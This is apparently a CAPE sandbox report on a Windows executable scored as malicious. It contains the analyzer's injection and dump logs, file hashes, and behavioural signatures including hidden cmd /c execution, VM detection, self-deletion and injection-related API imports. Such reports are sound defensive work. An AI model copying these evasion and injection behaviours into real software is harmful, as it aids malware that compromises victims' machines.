2020-03-24 09:45:23,447 [root] DEBUG: DLL loaded at 0x000007FEFA030000: C:\Windows\system32\rasadhlp (0x8000 bytes).
2020-03-24 09:45:23,821 [root] DEBUG: DLL loaded at 0x000007FEFAE20000: C:\Windows\System32\fwpuclnt (0x53000 bytes).
2020-03-24 09:45:26,036 [root] DEBUG: DLL loaded at 0x000007FEFC680000: C:\Windows\system32\schannel (0x57000 bytes).
2020-03-24 09:45:26,052 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2020-03-24 09:45:26,052 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2020-03-24 09:45:27,736 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2020-03-24 09:45:27,736 [root] DEBUG: DLL loaded at 0x000007FEFCA70000: C:\Windows\system32\ncrypt (0x4e000 bytes).
2020-03-24 09:45:27,736 [root] DEBUG: DLL loaded at 0x000007FEFCA40000: C:\Windows\system32\bcrypt (0x22000 bytes).
2020-03-24 09:45:27,736 [root] DEBUG: DLL loaded at 0x000007FEFC530000: C:\Windows\system32\bcryptprimitives (0x4c000 bytes).
2020-03-24 09:45:27,752 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\USERENV (0x1e000 bytes).
2020-03-24 09:45:27,767 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2020-03-24 09:45:27,829 [root] DEBUG: DLL loaded at 0x000007FEFC390000: C:\Windows\system32\GPAPI (0x1b000 bytes).
2020-03-24 09:45:27,845 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\cryptbase (0xf000 bytes).
2020-03-24 09:45:27,845 [root] DEBUG: DLL loaded at 0x000007FEF9920000: C:\Windows\system32\cryptnet (0x26000 bytes).
2020-03-24 09:45:27,861 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2020-03-24 09:45:27,877 [root] DEBUG: DLL loaded at 0x000007FEFBA20000: C:\Windows\system32\SensApi (0x9000 bytes).
2020-03-24 09:45:27,924 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:45:27,924 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2020-03-24 09:45:27,924 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:45:27,954 [root] DEBUG: DLL loaded at 0x000007FEF44E0000: C:\Windows\system32\Cabinet (0x1b000 bytes).
2020-03-24 09:45:27,954 [root] DEBUG: DLL loaded at 0x000007FEFC3D0000: C:\Windows\system32\DEVRTL (0x12000 bytes).
2020-03-24 09:45:27,986 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:45:28,002 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-03-24 09:45:28,002 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2020-03-24 09:45:28,016 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:45:28,032 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2020-03-24 09:45:28,032 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:45:28,063 [root] DEBUG: DLL loaded at 0x000007FEFAD90000: C:\Windows\system32\dhcpcsvc6 (0x11000 bytes).
2020-03-24 09:45:28,079 [root] DEBUG: DLL loaded at 0x000007FEFAD70000: C:\Windows\system32\dhcpcsvc (0x18000 bytes).
2020-03-24 09:45:28,095 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:28,111 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2020-03-24 09:45:28,111 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:28,111 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:28,127 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:30,122 [root] DEBUG: DLL unloaded from 0x000007FEF9920000.
2020-03-24 09:45:30,154 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:45:30,154 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:45:30,170 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:45:32,322 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:32,322 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:32,338 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:32,338 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:33,710 [root] DEBUG: DLL unloaded from 0x000007FEF9920000.
2020-03-24 09:45:33,726 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:45:33,726 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:45:33,757 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:45:33,757 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:33,773 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:33,773 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:33,773 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:34,226 [root] DEBUG: DLL unloaded from 0x000007FEF9920000.
2020-03-24 09:45:34,242 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:45:34,242 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:45:34,273 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:45:35,131 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1632
2020-03-24 09:45:35,131 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:45:35,131 [lib.api.process] INFO: 64-bit DLL to inject is C:\sdijqg\dll\YohPbkoy.dll, loader C:\sdijqg\bin\UtRRdOuA.exe
2020-03-24 09:45:35,131 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:45:35,131 [root] DEBUG: Loader: Injecting process 1632 (thread 2140) with C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:35,131 [root] DEBUG: Process image base: 0x00000000FF900000
2020-03-24 09:45:35,131 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2020-03-24 09:45:35,131 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-03-24 09:45:35,147 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:45:35,147 [root] DEBUG: Process dumps enabled.
2020-03-24 09:45:35,147 [root] INFO: Disabling sleep skipping.
2020-03-24 09:45:35,161 [root] WARNING: Unable to place hook on LockResource
2020-03-24 09:45:35,161 [root] WARNING: Unable to hook LockResource
2020-03-24 09:45:35,193 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1632 at 0x0000000074460000, image base 0x00000000FF900000, stack from 0x0000000003AB2000-0x0000000003AC0000
2020-03-24 09:45:35,193 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2020-03-24 09:45:35,193 [root] INFO: Added new process to list with pid: 1632
2020-03-24 09:45:35,193 [root] INFO: Monitor successfully loaded in process with pid 1632.
2020-03-24 09:45:35,193 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-03-24 09:45:35,193 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-03-24 09:45:35,209 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:35,381 [root] DEBUG: set_caller_info: Adding region at 0x0000000001FF0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 09:45:35,381 [root] DEBUG: set_caller_info: Adding region at 0x0000000003A40000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:45:35,395 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2092
2020-03-24 09:45:35,395 [root] DEBUG: set_caller_info: Adding region at 0x000000000C610000 to caller regions list (ntdll::NtClose).
2020-03-24 09:45:35,395 [root] DEBUG: GetHookCallerBase: thread 2068 (handle 0x0), return address 0x00000000FFA11D42, allocation base 0x00000000FFA10000.
2020-03-24 09:45:35,411 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00000000FFA10000.
2020-03-24 09:45:35,411 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:45:35,411 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FFA10000.
2020-03-24 09:45:35,411 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000246C.
2020-03-24 09:45:35,427 [root] INFO: Added new CAPE file to list with path: C:\RMoLMdOT\CAPE\2092_13621061567261824232020
2020-03-24 09:45:35,427 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x6600.
2020-03-24 09:45:35,427 [root] DEBUG: DLL unloaded from 0x000007FEFC530000.
2020-03-24 09:45:35,443 [root] DEBUG: DLL unloaded from 0x000007FEFCCF0000.
2020-03-24 09:45:35,443 [root] DEBUG: DLL unloaded from 0x000007FEFC680000.
2020-03-24 09:45:35,443 [root] DEBUG: DLL unloaded from 0x000007FEFC500000.
2020-03-24 09:45:35,443 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2020-03-24 09:45:35,459 [root] INFO: Notified of termination of process with pid 2092.
2020-03-24 09:45:35,568 [root] DEBUG: DLL loaded at 0x000007FEF4950000: C:\Windows\system32\WINHTTP (0x71000 bytes).
2020-03-24 09:45:35,582 [root] DEBUG: DLL loaded at 0x000007FEF4500000: C:\Windows\system32\webio (0x64000 bytes).
2020-03-24 09:45:35,582 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4500000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:35,582 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4950000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:35,582 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:35,582 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2020-03-24 09:45:35,582 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFEE90000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:45:35,582 [root] DEBUG: set_caller_info: Adding region at 0x0000000002760000 to caller regions list (winhttp::WinHttpConnect).
2020-03-24 09:45:35,598 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC890000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:45:35,598 [root] DEBUG: DLL loaded at 0x000007FEFC290000: C:\Windows\System32\wshtcpip (0x7000 bytes).
2020-03-24 09:45:35,598 [root] DEBUG: DLL loaded at 0x000007FEFC880000: C:\Windows\System32\wship6 (0x7000 bytes).
2020-03-24 09:45:35,615 [root] DEBUG: set_caller_info: Adding region at 0x0000000003E10000 to caller regions list (winhttp::WinHttpOpenRequest).
2020-03-24 09:45:35,615 [root] DEBUG: set_caller_info: Adding region at 0x0000000007C70000 to caller regions list (winhttp::WinHttpSetOption).
2020-03-24 09:45:35,615 [root] DEBUG: set_caller_info: Adding region at 0x0000000007C70000 to caller regions list (winhttp::WinHttpSendRequest).
2020-03-24 09:45:35,615 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC710000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:45:35,615 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC710000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:45:35,615 [root] DEBUG: DLL loaded at 0x000007FEFA030000: C:\Windows\system32\rasadhlp (0x8000 bytes).
2020-03-24 09:45:35,615 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA030000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:35,630 [root] DEBUG: DLL loaded at 0x000007FEFAE20000: C:\Windows\System32\fwpuclnt (0x53000 bytes).
2020-03-24 09:45:35,630 [root] DEBUG: DLL unloaded from 0x000007FEFAF10000.
2020-03-24 09:45:35,630 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFAE20000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:38,016 [root] DEBUG: DLL loaded at 0x000007FEFC680000: C:\Windows\system32\schannel (0x57000 bytes).
2020-03-24 09:45:38,016 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC680000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:39,638 [root] DEBUG: DLL loaded at 0x000007FEFCA70000: C:\Windows\system32\ncrypt (0x4e000 bytes).
2020-03-24 09:45:39,654 [root] DEBUG: DLL loaded at 0x000007FEFCA40000: C:\Windows\system32\bcrypt (0x22000 bytes).
2020-03-24 09:45:39,654 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCA70000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:39,654 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCA40000 to caller regions list (ntdll::NtDeviceIoControlFile).
2020-03-24 09:45:39,671 [root] DEBUG: DLL loaded at 0x000007FEFC530000: C:\Windows\system32\bcryptprimitives (0x4c000 bytes).
2020-03-24 09:45:39,717 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC390000 to caller regions list (advapi32::RegOpenKeyExW).
2020-03-24 09:45:39,733 [root] DEBUG: DLL loaded at 0x000007FEF9920000: C:\Windows\system32\cryptnet (0x26000 bytes).
2020-03-24 09:45:39,749 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9920000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:39,749 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFBA20000 to caller regions list (ntdll::NtOpenSection).
2020-03-24 09:45:39,763 [root] DEBUG: DLL loaded at 0x000007FEF44E0000: C:\Windows\system32\Cabinet (0x1b000 bytes).
2020-03-24 09:45:39,763 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF44E0000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:39,842 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:45:39,904 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFAD90000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:39,904 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFAF10000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:45:39,920 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:39,920 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFE2F0000 to caller regions list (ntdll::NtCreateEvent).
2020-03-24 09:45:39,920 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:39,936 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:39,936 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:41,292 [root] DEBUG: DLL unloaded from 0x000007FEF9920000.
2020-03-24 09:45:41,323 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:45:41,417 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:41,417 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:41,433 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:45:41,448 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:45:41,730 [root] DEBUG: DLL unloaded from 0x000007FEF9920000.
2020-03-24 09:45:41,760 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:45:42,618 [root] DEBUG: set_caller_info: Adding region at 0x0000000006DC0000 to caller regions list (ntdll::NtClose).
2020-03-24 09:45:42,618 [root] DEBUG: set_caller_info: Adding region at 0x0000000000060000 to caller regions list (user32::SetWindowLongPtrA).
2020-03-24 09:46:25,831 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2020-03-24 09:46:25,831 [root] INFO: Created shutdown mutex.
2020-03-24 09:46:26,174 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2020-03-24 09:46:26,845 [lib.api.process] INFO: Terminate event set for process 1632
2020-03-24 09:46:26,845 [root] DEBUG: Terminate Event: Attempting to dump process 1632
2020-03-24 09:46:26,845 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00000000FF900000.
2020-03-24 09:46:26,845 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:46:26,845 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FF900000.
2020-03-24 09:46:26,845 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000002B790.
2020-03-24 09:46:26,907 [root] INFO: Added new CAPE file to list with path: C:\RMoLMdOT\CAPE\1632_15268501682646924232020
2020-03-24 09:46:26,907 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x2baa00.
2020-03-24 09:46:26,907 [lib.api.process] INFO: Termination confirmed for process 1632
2020-03-24 09:46:26,907 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 1632
2020-03-24 09:46:26,907 [root] INFO: Terminate event set for process 1632.
2020-03-24 09:46:26,907 [root] INFO: Terminating process 1632 before shutdown.
2020-03-24 09:46:26,907 [root] INFO: Waiting for process 1632 to exit.
2020-03-24 09:46:27,924 [root] INFO: Shutting down package.
2020-03-24 09:46:27,924 [root] INFO: Stopping auxiliary modules.
2020-03-24 09:46:27,924 [root] INFO: Finishing auxiliary modules.
2020-03-24 09:46:27,924 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-03-24 09:46:27,924 [root] WARNING: File at path "C:\RMoLMdOT\debugger" does not exist, skip.
2020-03-24 09:46:27,924 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2020-03-24 09:43:03 2020-03-24 09:46:42

File Details

File Name ddaa6aba4618362ad65ad4d6eb6d1ff7cc909f9dcb98b0aa2c6627a2a7d5b514
File Size 322048 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0116e1cc3ef60e3cb910654c95e1d1c6
SHA1 a9126493e87f3f761efe8ae9aed4cc4e58ed819e
SHA256 ddaa6aba4618362ad65ad4d6eb6d1ff7cc909f9dcb98b0aa2c6627a2a7d5b514
SHA512 40f2880784f086494f19109aa0ca196fe4d0b5764ee17da8d2227582693ea9097b9e977faa1e62288b6bc0f56f813672150915b018b14a21b7014df3a9aaee6a
CRC32 588CA946
Ssdeep 6144:BoxAQURWtJ8ru6Cf6kkRrrsNSc6bkuk+QyR3/oOYW39sE6cXsQFqvCE:KTH8ru5kEu9tx/kWtvfFYCE
TrID
  • 38.4% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 26.3% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 11.8% (.EXE) OS/2 Executable (generic) (2029/13)
  • 11.6% (.EXE) Generic Win/DOS Executable (2002/3)
  • 11.6% (.EXE) DOS Executable Generic (2000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Resubmit sample

Signatures

Behavioural detection: Executable code extraction
SetUnhandledExceptionFilter detected (possible anti-debug)
Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution
command: cmd /c ""C:\Users\user\AppData\Local\Temp\DA24\BF2.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
command: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 920 trigged the Yara rule 'vmdetect'
Hit: PID 948 trigged the Yara rule 'vmdetect'
Hit: PID 0 trigged the Yara rule 'embedded_win_api'
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: ErfkBwzLz2p.exe, PID 920
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\Local\Temp\DA24\BF2.bat
DeletedFile: C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab9694.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar96A5.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab9713.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar9714.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab9F5F.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar9F60.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabAD55.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarAD56.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabAF5A.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarAF5B.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabC4E4.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarC4E5.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabCAEF.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarCAF0.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabCB3F.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarCB40.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabCCA8.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarCCA9.tmp
Attempts to connect to a dead IP:Port (5 unique times)
IP: 192.229.232.240:80 (United States)
IP: 185.85.0.29:443 (Germany)
IP: 192.42.116.41:80 (Netherlands)
IP: 185.85.0.29:80 (Germany)
IP: 23.202.161.73:80 (United States)
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/RtlUnwind
DynamicLoader: ntdll.dll/NtQueryVirtualMemory
DynamicLoader: SHLWAPI.dll/PathFindExtensionW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindExtensionA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: SHLWAPI.dll/StrTrimW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInfo
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceRegistryPropertyA
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsA
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/GetCommandLineW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/GetLongPathNameW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: USER32.dll/DefWindowProcW
DynamicLoader: USER32.dll/SendMessageW
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/CreateWindowExW
DynamicLoader: USER32.dll/SetWindowLongW
DynamicLoader: USER32.dll/SetClassLongW
DynamicLoader: USER32.dll/SystemParametersInfoW
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetWindowLongW
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: USER32.dll/GetForegroundWindow
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/GetMessageW
DynamicLoader: USER32.dll/keybd_event
DynamicLoader: USER32.dll/DestroyWindow
DynamicLoader: USER32.dll/wsprintfW
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/RegDeleteValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
